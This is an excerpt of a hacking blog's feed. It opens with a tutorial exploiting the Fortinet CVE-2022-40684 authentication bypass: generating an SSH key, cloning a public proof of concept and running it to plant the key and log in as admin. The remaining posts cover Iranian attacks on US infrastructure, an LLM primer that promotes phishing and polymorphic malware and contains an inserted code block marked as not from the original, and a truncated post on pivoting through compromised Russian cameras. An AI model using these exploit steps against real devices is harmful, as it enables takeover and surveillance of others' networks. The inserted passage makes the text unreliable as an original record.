<p>The cybersecurity industry is dependent upon a few developers to produce routers and VPNs to keep our data safe. Unfortunately, many of these developers have failed to provide products that take into account even the most rudimentary cybersecurity practices. Many of them are like Swiss cheese, full of vulnerable holes that hackers and state actors are exploiting at will. These devices may be the weakest link in your network!</p>
<p>If the bad actors compromise your VPN/Router, ALL of your data is at risk. Not only is your data at risk, but the bad actors can also use the exploits of your VPN/Router to upload other malicious code such as ransomware. Among the companies guilty of this cybersecurity negligence, Fortinet stands out!</p>
<p>In 2022, a vulnerability was discovered in FortiOS, FortiProxy, and FortiSwitchManager that allows an attacker to bypass authentication and log in to the device as admin. Security researchers at Horizon3 were able to develop a proof-of-concept (PoC) to exploit this vulnerability. We are using that exploit in this tutorial.</p>
<p>In this attack, the attacker is capable of uploading their own SSH keys to the Fortinet device via the web server and then logging in as admin through SSH.</p>
<p class="has-medium-font-size"><strong>Step #1: Attempt to Login to SSH on the Fortinet Device</strong></p>
<p>First, let’s attempt to log in to the Fortinet device over SSH.</p>
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="627" height="288" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-failed-login.png" alt="" class="wp-image-15216" style="width:750px;height:auto" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-failed-login.png 627w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-failed-login-300x138.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></figure>
<p>As expected, after 3 failed attempts, the SSH application locks us out.</p>
<p>Now, make certain that you create a key pair for SSH.</p>
<p>kali > ssh-keygen</p>
<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1002" height="151" data-id="15308" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen.png" alt="" class="wp-image-15308" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen.png 1002w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen-300x45.png 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen-768x116.png 768w" sizes="(max-width: 1002px) 100vw, 1002px" /></figure>
</figure>
<p>As you can see above, our SSH application generated a key pair (private/public) and placed it into the hidden directory /home/kali/.ssh/ as id_ed25519. Your key pair will be different and may have a different file name.</p>
<p class="has-medium-font-size"><strong>Step #2: Download and Install the PoC for CVE-2022-40684</strong></p>
<p>Thanks to the good people at Horizon3.ai, we have a publicly available proof-of-concept (PoC) exploit for this vulnerability.</p>
<p>You can find it at <a href="https://github.com/horizon3ai/CVE-2022-40684" rel="noreferrer noopener" target="_blank">https://github.com/horizon3ai/CVE-2022-40684</a></p>
<p>kali > git clone https://github.com/horizon3ai/CVE-2022-40684</p>
<p>After cloning it into your Kali, navigate to the new directory.</p>
<p>To execute this exploit/PoC, we simply need to point the exploit at the target system’s IP address, define the SSH username you want to take over, and send your key file for that SSH user to the targeted device, such as:</p>
<p>kali > sudo python3 poc.py -t &lt;IP address&gt; --username admin --key-file &lt;ssh key file&gt;</p>
<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="116" data-id="15226" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-1024x116.png" alt="" class="wp-image-15226" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-1024x116.png 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-300x34.png 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-768x87.png 768w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2.png 1219w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</figure>
<p>Now that we have added our key file to the SSH server, we should be able to log in as admin with OUR SSH key.</p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="538" height="129" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-success-1.png" alt="" class="wp-image-15222" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-success-1.png 538w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-success-1-300x72.png 300w" sizes="(max-width: 538px) 100vw, 538px" /></figure>
<p>As you can see above, we have successfully logged into the Fortinet device as admin and now have complete control of this device!</p>
<p>We can take a further step and enter the “show” command to display some basic information on this system including the “user=admin”.</p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="860" height="406" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config.png" alt="" class="wp-image-15225" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config.png 860w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config-300x142.png 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config-768x363.png 768w" sizes="(max-width: 860px) 100vw, 860px" /></figure>
<p>As an attacker, I can now shut down or reconfigure your device as well as sniff all the traffic across this interface.</p>
<p class="has-medium-font-size"><strong>Summary</strong></p>
<p>Although VPNs are marketed to organizations around the globe to keep us safe and secure, the developers of these devices have proven themselves to be unworthy of the trust we place in them. Many of these devices are the weakest link on our network.</p>
<p>Any pentest or cyberwar strategy that does not test the security of these devices is inadequate and insufficient. Attend our upcoming VPN and Router Hacking training to learn the latest techniques for testing and hacking these vulnerable devices!</p>
<p>The post <a href="https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/">VPN Hacking: Authentication Bypass on Fortinet Fortios</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Now that the US Has Bombed Iran, Should We Expect Attacks Against US Critical Industrial Infrastructure (SCADA/ICS)?</title>
<link>https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/</link>
<comments>https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Sat, 21 Jun 2025 15:15:41 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[SCADA/ICS Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15783</guid>
<description><![CDATA[<p>Welcome back, my cyberwarriors! As the US and Iran lurch toward a military confrontation, we must ask whether the US and other western nations’ industrial facilities are at risk. Unquestionably, Iran does NOT have the military capabilities to counter the US in a kinetic war, but could they terrorize the US industrial facilities instead? In […]</p>
<p>The post <a href="https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/">Now that the US Has Bombed Iran, Should We Expect Attacks Against US Critical Industrial Infrastructure (SCADA/ICS)?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p>Welcome back, my cyberwarriors!</p>
<p>As the US and Iran lurch toward a military confrontation, we must ask whether the US and other western nations’ industrial facilities are at risk. Unquestionably, Iran does NOT have the military capabilities to counter the US in a kinetic war, but could they terrorize the US industrial facilities instead?</p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="682" src="https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-1024x682.jpg" alt="" class="wp-image-15786" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-1024x682.jpg 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-300x200.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident-768x512.jpg 768w, https://hackers-arise.com/wp-content/uploads/2025/06/fukusima-accident.jpg 1247w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>In this era of cyberwar, nations without significant kinetic (guns, planes, boats, bullets) capabilities can offset that lack with cyberwar capabilities. This is often referred to as asymmetric warfare. One nation spends trillions of dollars on aircraft carriers, stealth bombers, rockets, and an army of millions, while a nation with a handful of skilled hackers, computers, and internet access in a bunker can counter that military behemoth at less than 1% of the cost. A good part of Ukraine’s success at holding off the much larger and better-equipped Russian military over the last 3 years can be attributed to this asymmetric warfare by Ukraine’s cyberwarriors. Can Iran’s cyberwarriors do the same?</p>
<p>Iran has a highly skilled entourage of hackers that have targeted US industrial facilities for decades. SCADA/ICS are the favored target in cyberwar. By compromising SCADA/ICS facilities, the attacker can:</p>
<ol class="wp-block-list">
<li>weaken the local economy,</li>
<li>limit the availability of clean drinking water,</li>
<li>limit communication (mobile and Internet),</li>
<li>restrict the availability of electricity,</li>
<li>blow up a facility, thereby using it as a weapon,</li>
<li>limit the ability to manufacture war products.</li>
</ol>
<p>This list could go on and on, and all of these attacks have been used in the Ukraine/Russia war.</p>
<p>SCADA/ICS attacks can be devastating!</p>
<p>Iran has long been interested in compromising US industrial facilities. Over the past decade (2015–2025), Iran has repeatedly targeted U.S. infrastructure through a range of cyberattacks. </p>
<p>Below I have created a brief chronology and description of significant Iranian cyber operations against U.S. infrastructure sectors, based on public indictments, government advisories, and major news reports.</p>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="1-financial-sector-ddos-attacks-20112013-publicize">1. Financial Sector DDoS Attacks (2011–2013; publicized in 2016)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> Izz ad-Din al-Qassam Cyber Fighters, linked to the Iranian government and Islamic Revolutionary Guard Corps (IRGC).</li>
<li><strong>Method:</strong> Large-scale distributed denial-of-service (DDoS) attacks.</li>
<li><strong>Targets:</strong> Nearly 50 major U.S. financial institutions, including Bank of America, New York Stock Exchange, and Capital One.</li>
<li><strong>Impact:</strong> Disrupted online banking for millions; tens of millions of dollars in response costs.</li>
<li><strong>Details:</strong> Botnets generated up to 140Gbps of traffic, overwhelming bank servers.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="2-bowman-avenue-dam-intrusion-2013-indictment-in-2">2. Bowman Avenue Dam Intrusion (2013; indictment in 2016)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> Iranian hackers employed by ITSec Team and Mersad Co., working for the IRGC.</li>
<li><strong>Method:</strong> Unauthorized access to a small dam’s SCADA system in Rye Brook, New York.</li>
<li><strong>Impact:</strong> Attackers accessed status and operational data; physical sabotage was averted only because the sluice gate was offline for maintenance.</li>
<li><strong>Significance:</strong> Demonstrated intent and capability to target U.S. industrial control systems.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="3-boston-childrens-hospital-attack-attempt-2022">3. Boston Children’s Hospital Attack Attempt (2022)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> Three Iranian nationals indicted.</li>
<li><strong>Method:</strong> Attempted cyberattack, specifics undisclosed.</li>
<li><strong>Target:</strong> Boston Children’s Hospital.</li>
<li><strong>Impact:</strong> FBI intervention prevented disruption; hospital network and patient care protected.</li>
<li><strong>Significance:</strong> Highlighted Iranian willingness to target healthcare infrastructure.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="4-water-utilities-attacks-20232024">4. Water Utilities Attacks (2023–2024)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> CyberAv3ngers, an IRGC-affiliated group.</li>
<li><strong>Method:</strong> Exploitation of vulnerabilities in Israeli-made Unitronics PLCs (industrial control devices), often using default passwords.</li>
<li><strong>Targets:</strong> At least a Pittsburgh-area water utility and nearly ten other small U.S. water utilities.</li>
<li><strong>Impact:</strong> One utility (Aliquippa, PA) forced to operate a water pump station manually; others experienced limited operational impact.</li>
<li><strong>Significance:</strong> Demonstrated ability to disrupt physical infrastructure and the risk to under-resourced utilities.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="5-healthcare-sector-attacks-20232024">5. Healthcare Sector Attacks (2023–2024)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> Iranian cyber actors, sometimes collaborating with ransomware affiliates.</li>
<li><strong>Method:</strong> Disruption and extortion attempts, including ransomware.</li>
<li><strong>Targets:</strong> U.S. healthcare organizations and hospitals.</li>
<li><strong>Impact:</strong> Attempts to lock networks and extort victims; ongoing threat to patient care and data security.</li>
<li><strong>Significance:</strong> Shows expansion of Iranian targeting to vital civilian infrastructure.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="6-critical-infrastructure-brute-force-campaigns-20">6. Critical Infrastructure Brute-Force Campaigns (2023–2024)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> Iranian state-sponsored hackers.</li>
<li><strong>Method:</strong> Brute-force credential attacks to compromise user accounts and modify multi-factor authentication (MFA) settings for persistent access.</li>
<li><strong>Targets:</strong> Multiple sectors, including healthcare, government, IT, engineering, and energy.</li>
<li><strong>Impact:</strong> Enabled persistent access to sensitive systems, sometimes selling credentials on criminal forums for further exploitation.</li>
<li><strong>Significance:</strong> Highlights persistent, multi-sector targeting and credential theft as a vector.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="7-malware-targeting-industrial-control-systems-202">7. Malware Targeting Industrial Control Systems (2023–2025)</h2>
<ul class="wp-block-list">
<li><strong>Actors:</strong> CyberAv3ngers, IRGC Cyber-Electronic Command.</li>
<li><strong>Method:</strong> Deployment of malware (e.g., IOControl) against ICS/SCADA devices.</li>
<li><strong>Targets:</strong> U.S. critical infrastructure sectors, including water and energy.</li>
<li><strong>Impact:</strong> Potential for deep network access and more profound cyber-physical effects.</li>
<li><strong>Significance:</strong> Ongoing U.S. government efforts to identify and sanction responsible individuals.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading" id="summary-table">Summary Table</h2>
<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>Year(s)</th><th>Sector</th><th>Attack/Method</th><th>Impact/Notes</th></tr></thead><tbody><tr><td>2011–2013</td><td>Financial</td><td>DDoS</td><td>Major bank disruptions, tens of millions in damages</td></tr><tr><td>2013</td><td>Industrial (Dam)</td><td>SCADA intrusion</td><td>No physical damage, but access to controls</td></tr><tr><td>2022</td><td>Healthcare</td><td>Attempted cyberattack</td><td>FBI intervention, no disruption</td></tr><tr><td>2023–2024</td><td>Water Utilities</td><td>ICS/PLC exploitation</td><td>Manual operation required at one utility</td></tr><tr><td>2023–2024</td><td>Healthcare</td><td>Ransomware, extortion</td><td>Disruption, extortion attempts</td></tr><tr><td>2023–2024</td><td>Critical Infrastructure</td><td>Brute-force, MFA compromise</td><td>Persistent access, credential theft</td></tr><tr><td>2023–2025</td><td>Industrial/ICS</td><td>Malware (IOControl)</td><td>Deep access, ongoing threat</td></tr></tbody></table></figure>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<p class="has-medium-font-size"><strong>Summary</strong></p>
<p>With the world teetering on the brink of another full-scale war, Iran may choose to counter-attack with cyber operations. Their history and capabilities indicate that this would be their most likely vector for countering a US kinetic attack.</p>
<p>To learn more about SCADA/ICS hacking and security, see our unique training program at the link below.</p>
<p><a href="https://hackersarise.thinkific.com/courses/hacking-scada-systems">https://hackersarise.thinkific.com/courses/hacking-scada-systems</a></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="489" height="179" src="https://hackers-arise.com/wp-content/uploads/2025/06/scada-testo.png" alt="" class="wp-image-15784" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/scada-testo.png 489w, https://hackers-arise.com/wp-content/uploads/2025/06/scada-testo-300x110.png 300w" sizes="(max-width: 489px) 100vw, 489px" /></figure><p>The post <a href="https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/">Now that the US Has Bombed Iran, Should We Expect Attacks Against US Critical Industrial Infrastructure (SCADA/ICS)?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>How Artificial Intelligence (AI) Large Language Models (LLMs) Work, Part 1</title>
<link>https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/</link>
<comments>https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Fri, 20 Jun 2025 16:22:29 +0000</pubDate>
<category><![CDATA[Artificial Intelligence]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Defensive Security]]></category>
<category><![CDATA[Offensive Security]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15771</guid>
<description><![CDATA[<p>Welcome back, my aspiring cyberwarriors! We are living on the cusp of one of the most exciting eras in the history of technology! Artificial Intelligence (AI) is about to change everything we do and change the way the world operates. This change will likely be more dramatic and consequential than the invention of printing press […]</p>
<p>The post <a href="https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/">How Artificial Intelligence (AI) Large Language Models (LLMs) Work, Part 1</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
<p>We are living on the cusp of one of the most exciting eras in the history of technology!</p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="576" src="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic.webp" alt="" class="wp-image-15777" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic-300x169.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/LLM-pic-768x432.webp 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>Artificial Intelligence (AI) is about to change everything we do and change the way the world operates. This change will likely be more dramatic and consequential than the invention of the printing press or the development of the internet. For this reason, it is incumbent upon you to try to understand what is taking place and how. Only in this way can you stay ahead of this tsunami and ride this wave to a better job and a higher income. Those who ignore this wave will likely be washed away into the dustbin of history.</p>
<p>With that goal in mind, I have started this series on how large language models (LLM) work in AI.</p>
<p class="has-large-font-size"><strong>Under the Hood</strong></p>
<p>At the core of every LLM lies the <strong>transformer architecture</strong>—a neural network designed to handle sequences (like sentences or code). Unlike older models that processed words one-by-one, transformers analyze entire sequences in parallel using <strong>self-attention</strong>. This mechanism lets the model weigh the importance of every word in a sentence relative to others. For example:</p>
<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><em>“The hacker breached the router”</em><br>Here, “breached” links strongly to “hacker” and “router,” ignoring irrelevant words. This contextual understanding is what makes LLMs so powerful.</p>
</blockquote>
<h2 class="wp-block-heading">Training: Gorging on Data</h2>
<p>LLMs train on <strong>massive text corpora</strong>—think Wikipedia, books, code repositories, and web pages (GPT-3 devoured 45TB of text!). During training:</p>
<ol class="wp-block-list">
<li><strong>Tokenization</strong>: Text is split into chunks (tokens), which can be words, subwords, or symbols.</li>
<li><strong>Embedding</strong>: Tokens convert into numerical vectors (e.g., “router” → <code>[0.24, -1.7, ...]</code>), capturing semantic relationships. Similar words cluster in vector space.</li>
<li><strong>Next-Word Prediction</strong>: The model learns by guessing the next token in sequences. Correct guesses reinforce connections; errors adjust the model’s <strong>175 billion+ parameters</strong> (weights/biases).</li>
</ol>
<p>This unsupervised pre-training teaches grammar, facts, and reasoning—no human labels needed.</p>
<h2 class="wp-block-heading">Text Generation: The Inference Loop</h2>
<p>When you prompt an LLM, here’s what happens under the hood:</p>
<ol class="wp-block-list">
<li><strong>Tokenize Input</strong>: Your prompt (“Explain VPNs to a hacker”) splits into tokens.</li>
<li><strong>Process Through Layers</strong>:
<ul class="wp-block-list">
<li>Embedding layer converts tokens to vectors.</li>
<li>Transformer layers apply self-attention and feed-forward networks to build context.</li>
<li>Output layer generates a probability distribution for the next token.</li>
</ul>
</li>
<li><strong>Sample and Repeat</strong>: The model picks the next token (e.g., “VPNs” → “create”), appends it, and repeats until done.</li>
</ol>
<p><strong>Note</strong>: Control output randomness with:</p>
<ul class="wp-block-list">
<li><code>temperature</code> (higher = more creative)</li>
<li><code>top-p</code> (limits sampling to high-probability tokens)</li>
</ul>
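<p>As an added example (not code from the original post), the training and inference steps above run end to end on a toy scale: a bigram count table built from a constructed corpus stands in for the transformer, and the generation loop applies the <code>temperature</code> and <code>top-p</code> knobs exactly as described. The corpus, function names and the bigram model are all assumptions made for this illustration.</p>

```python
"""Toy next-token model: tokenize, train by counting, then sample.

Added example, not code from the original post. A bigram count table
replaces the transformer so the tokenize -> predict -> sample -> append
loop, with temperature and top-p (nucleus) sampling, can be seen whole.
"""
import math
import random
from collections import Counter, defaultdict

# Constructed training corpus (made up for this example).
CORPUS = """
the hacker breached the router .
the hacker scanned the network .
the router logged the breach .
the analyst reviewed the router logs .
"""


def tokenize(text):
    """Whitespace tokenizer: every word and punctuation mark is one token."""
    return text.split()


def train_bigram(text):
    """'Next-word prediction' reduced to counting: how often nxt follows cur."""
    counts = defaultdict(Counter)
    toks = tokenize(text)
    for cur, nxt in zip(toks, toks[1:]):
        counts[cur][nxt] += 1
    return counts


def next_token_logits(counts, token):
    """Log-counts play the role of the output layer's logits for one position."""
    row = counts.get(token)
    return {t: math.log(c) for t, c in row.items()} if row else {}


def softmax(logits, temperature=1.0):
    """Turn logits into probabilities; lower temperature sharpens the peak."""
    if not logits:
        return {}
    if temperature <= 0:  # greedy decoding: all mass on the argmax
        best = max(logits, key=logits.get)
        return {best: 1.0}
    m = max(logits.values())  # subtract max for numerical stability
    exps = {t: math.exp((l - m) / temperature) for t, l in logits.items()}
    z = sum(exps.values())
    return {t: e / z for t, e in exps.items()}


def top_p_filter(probs, p):
    """Keep the smallest high-probability set whose mass reaches p, renormalised."""
    ranked = sorted(probs.items(), key=lambda kv: kv[1], reverse=True)
    kept, mass = [], 0.0
    for tok, pr in ranked:
        kept.append((tok, pr))
        mass += pr
        if mass >= p:
            break
    z = sum(pr for _, pr in kept)
    return {tok: pr / z for tok, pr in kept}


def sample(probs, rng):
    """Draw one token from the (already filtered) distribution."""
    r, acc, tok = rng.random(), 0.0, None
    for tok, pr in probs.items():
        acc += pr
        if r <= acc:
            return tok
    return tok  # guard against float rounding below 1.0


def generate(counts, prompt, max_new=10, temperature=1.0, top_p=1.0, seed=0):
    """The inference loop: predict, sample, append, repeat until '.' or max_new."""
    rng = random.Random(seed)
    toks = tokenize(prompt)
    for _ in range(max_new):
        logits = next_token_logits(counts, toks[-1])
        if not logits:  # unseen token: nothing to predict from
            break
        probs = top_p_filter(softmax(logits, temperature), top_p)
        tok = sample(probs, rng)
        toks.append(tok)
        if tok == ".":
            break
    return " ".join(toks)


if __name__ == "__main__":
    model = train_bigram(CORPUS)
    print(generate(model, "the", temperature=0))          # greedy, deterministic
    print(generate(model, "the", temperature=1.5, top_p=0.9, seed=7))
```

With <code>temperature=0</code> the loop always picks the most frequent continuation, so the greedy output is reproducible; raising the temperature and lowering <code>top_p</code> trades that predictability for variety drawn only from the most probable tokens.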
<h2 class="wp-block-heading">Why Hackers Should Care</h2>
<p>LLMs are <strong>force multipliers</strong>:</p>
<ul class="wp-block-list">
<li><strong>Social Engineering</strong>: Generate convincing phishing emails or fake personas.</li>
<li><strong>Code Automation</strong>: Write scripts for scanning, exploits, or tooling (e.g., “Write a Python port scanner”).</li>
<li><strong>Recon</strong>: Summarize leaked docs or technical manuals in seconds.</li>
<li><strong>Obfuscation</strong>: Use LLMs to craft polymorphic malware or evade detection.</li>
</ul>
<p><strong>Gotcha</strong>: LLMs hallucinate. Always verify outputs, especially for critical ops.</p>
<h2 class="wp-block-heading">Build Your Own LLM: Minimalist Demo</h2>
<p>Would you like to train a nano-LLM? Here’s the basic skeleton in Python to get started.</p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="581" height="227" src="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-python.png" alt="" class="wp-image-15776" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/LLM-python.png 581w, https://hackers-arise.com/wp-content/uploads/2025/06/LLM-python-300x117.png 300w" sizes="(max-width: 581px) 100vw, 581px" /></figure>
<p>This uses GPT-2 to complete the phrase. You can swap <code>gpt2</code> for a larger model (e.g., <code>gpt-j-6B</code>) to get more complex results.</p>
<h2 class="wp-block-heading">The Future: LLMs in Offensive Security</h2>
<p>Imagine:</p>
<ul class="wp-block-list">
<li><strong>AI Red Teamers</strong>: LLMs that autonomously probe networks for weaknesses.</li>
<li><strong>Adaptive Malware</strong>: Code that rewrites itself using LLM feedback loops.</li>
<li><strong>Counter-LLM Warfare</strong>: Detecting AI-generated disinformation in ops.</li>
</ul>
<p><strong>Rule #1</strong>: Never trust an LLM blindly. Treat it like a rookie hacker—verify its work.</p>
<h2 class="wp-block-heading">Conclusion</h2>
<p>LLMs are neural networks on steroids: trained on internet-scale data, masters of context, and invaluable for hacking. Understand their architecture, leverage their generative power, and stay sharp—because in the AI arms race, the best hackers adapt fastest.</p>
<p><strong>Stay curious. Stay dangerous.</strong></p>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<p></p><p>The post <a href="https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/">How Artificial Intelligence (AI) Large Language Models (LLMs) Work, Part 1</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/how-artificial-intelligence-ai-large-language-models-llms-work-part-1/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Network Espionage: Using Russian Cameras as Proxies to Hide Your Data</title>
<link>https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/</link>
<comments>https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/#respond</comments>
<dc:creator><![CDATA[Alita]]></dc:creator>
<pubDate>Fri, 20 Jun 2025 14:01:40 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[IP Camera Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15739</guid>
<description><![CDATA[<p>Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into Moscow. This […]</p>
<p>The post <a href="https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/">Network Espionage: Using Russian Cameras as Proxies to Hide Your Data</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="900" height="550" src="https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2.jpg" alt="" class="wp-image-15768" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2.jpg 900w, https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2-300x183.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/digital-camera-2-768x469.jpg 768w" sizes="(max-width: 900px) 100vw, 900px" /></figure>
<p>Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into Moscow.</p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-1024x576.webp" alt="" class="wp-image-15741" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-1024x576.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-300x169.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view-768x432.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/06/1-moscow-city-camera-view.webp 1366w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p></p>
<p>This time, we’re taking it further and showing how compromising a camera can give you access to the network behind it.</p>
<p>Now let’s say you’ve compromised a camera and want to pivot deeper into the network. We’ll walk through a few examples, starting with enabling SSH and ending with deploying payloads using unpatched vulnerabilities. In Parts 2 and 3 you will learn how to analyze and modify the firmware.</p>
<h2 class="wp-block-heading"><a></a><strong>Case 1: Hikvision</strong></h2>
<p>Hikvision is one of the most common camera brands used across Russia. As shown in the screenshot below, thousands of their devices are exposed online via Shodan. Many of them still haven’t been patched against known vulnerabilities like CVE-2021-36260, even in 2025. This vulnerability can give you shell access on the device.</p>
<p></p>
